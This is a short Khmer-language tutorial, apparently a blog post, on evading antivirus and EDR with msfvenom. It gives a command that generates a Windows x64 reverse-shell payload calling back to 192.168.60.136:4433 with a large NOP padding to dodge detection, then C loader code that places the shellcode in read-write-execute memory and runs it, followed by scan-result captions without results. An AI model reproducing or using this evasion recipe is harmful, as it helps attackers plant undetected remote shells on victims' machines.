ខ្លះៗអំពីការ Bypass AV/EDR តាមរយៈ Msfvenom ។

Generate Payload

ខាងក្រោមជាដំណើរការបង្កើត Payload ដោយប្រើប្រាស់ Shellcode ជាភាសារ C គោលដៅលើម៉ាស៊ីន 64 bit និងបានថែមនូវពាក្យបញ្ជា -n ក្នុងន័យបង្កើតចំនួន Bytes ដែលមិនបានការដើម្បីព្យាយាមបង្វៀងពីការចាប់របស់ AV ។

1

msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.60.136 lport=4433 -f c -n 10000

ចំណាំ៖ ក្រោយ -n យើងអាចដាក់ចំនួនលេខកាន់តែច្រើនគឺមានលទ្ធភាពក្នុងការ Bypass បានកាន់តែច្រើន ។

បន្ទាប់មកយើងនឹង Compile Payload ធម្មតាដោយប្រើប្រាស់វិធីសាស្ត្រ Process Injection តាមបែប Slef-Injection ដោយផ្ដល់សិទ្ធតាមលំនាំដើម Read, Write និង Execute ។

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

#include <stdio.h>
#include <Windows.h>

int main()
{
    unsigned char shellcode[] =
		"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
		"\x52\x51\x56\x48\x31\xd2\[.....]\x8b\x52\x60\x48\x8b\x52"
		"\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb";

    void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, shellcode, sizeof shellcode);
    ((void(*)())exec)();

    return 0;
}

Scan Result

ខាងក្រោមជាលទ្ធផលពីការដាក់ចំនួន 1000 Bytes ។

ខាងក្រោមជាលទ្ធផលពីការដាក់ចំនួន 10000* Bytes ៕